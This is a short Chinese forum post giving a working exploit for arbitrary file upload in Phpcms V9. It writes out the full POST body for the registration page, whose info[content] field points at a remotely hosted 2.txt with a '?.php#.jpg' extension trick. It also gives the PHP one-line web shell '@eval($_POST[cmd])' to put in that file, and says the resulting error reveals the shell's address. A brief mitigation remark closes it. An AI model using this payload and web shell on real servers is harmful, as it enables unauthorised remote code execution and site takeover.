Phpcms_V9任意文件上传

下载最新版Phpcms,在注册页面进行post提交。EXP:

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=

2.txt中写入一句话:

<?php @eval($_POST[cmd]);?>


报错,并返回shell地址。
getshell。

感谢scriptkid大牛,该漏洞不只是注册处能触发,所以关闭注册是解决不了问题的,正确做法是让uploadfile下文件无法执行。
并且在注册页面中modelid=10,没有content字段,稍后会附上漏洞原理

点击收藏 | 0 关注 | 0
登录 后跟帖